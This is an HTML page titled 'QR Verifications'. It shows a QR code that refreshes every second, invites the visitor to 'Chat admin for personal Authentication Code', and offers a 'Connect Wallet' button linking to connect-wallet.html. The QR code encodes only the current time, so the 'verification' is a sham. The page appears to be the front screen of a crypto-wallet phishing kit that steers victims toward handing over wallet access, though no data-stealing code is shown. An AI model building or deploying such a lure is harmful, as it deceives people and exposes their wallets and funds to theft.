<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>QR Verifications</title>
    <link rel="shortcut icon" href="assets/images/favicon.png">
    <script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.0.0/jquery.min.js"></script>
    <script src="//cdn.rawgit.com/davidshimjs/qrcodejs/master/qrcode.min.js"></script>
    <style>
*, *::before, *::after {
  box-sizing: border-box;
  margin: 0;
  padding: 0;
} 

html, body {
  padding: 0;
  margin: 0;
}

body {
  background: #202020;
  font-family: Roboto;
  color: #454545;
  a {
    text-decoration: none;
    color: #9a9a9a;

    &:hover {
      color: #ffffff;
    }
  }
}

#note {
  text-align: center;
  width: 400px;
  margin: 20px;
  padding: 0px 20px 20px 20px;
}

/* #box {
  left: 50%;
  top: 50%;
  transform: translate(-50%, -50%);
  box-shadow: 0px 0px 10px rgba(0, 0, 0, 0.5);
  position: absolute;
  background:#262626;
  width: 400px;
  height: 400px;
  -webkit-user-select: none;
  -moz-user-select: none;    
  -ms-user-select: none;      
  user-select: none; 
  
} */
#box {
  padding: 20px;
}
.contain {
  width: 100%;
  height: 100vh;
  display: flex;
  justify-content: center;
  align-items: center;
  padding: 50px;
}

#qrcode {
    padding: 20px;
    width: auto;
    display: flex;
    justify-content: center;
    align-items: center;
  }

  #qrcode canvas {
      width: 80% !important;
      height: 100% !important;
      padding: 30px 30px 0px 30px;
      margin: 30px auto !important;
  }

  #qrcode img {
      padding: 30px 30px 0px 30px;
  }
    </style>
</head>
<body>

  <div class="contain">
    <div id="box">
        <div id="qrcode"></div>
        <div id="note">
        <h3 style="color: #4aeef4; "> Chat admin for personal Authentication Code</h3>
        <p style="color: aliceblue;" >or Proceed to scan code on your mobile device wallet connection</p><br><br>
        <form action="./connect-wallet.html">
          <button style="padding: 20px 50px;  background: linear-gradient(45deg, #4aeef4, #0146fd); color: white; border-style: none; border-radius: 20px; font-size: 1.2em; cursor: pointer;">Connect Wallet</button>
        </form>
        </div>
    </div>
  </div>

      <script>$(function() {
        // If a value is one character, add a zero before it.
        function rset(s) {
          return (('' + s).length < 2 ? "0" + s : '' + s);
        }
        
        // Get the current local time in 24-hour notation (hh:mm:ss)
        function time() {
          var d = new Date();
          return rset(d.getHours()) + ":" + rset(d.getMinutes()) + ":" + rset(d.getSeconds());
        }
        
        // Create the QRCode instance
        var qrcode = new QRCode("qrcode", {
          text: time(),
          width: 400,
          height: 400,
          colorDark: "#262626",
          colorLight: "#dcdcd2",
          correctLevel: QRCode.CorrectLevel.H
        });
        
        +(function timer() {
          // Recreate the QR code
          qrcode.clear();
          qrcode.makeCode(time());
          
          setTimeout(timer, 1000);
        }());
      })
      </script>
</body>
</html>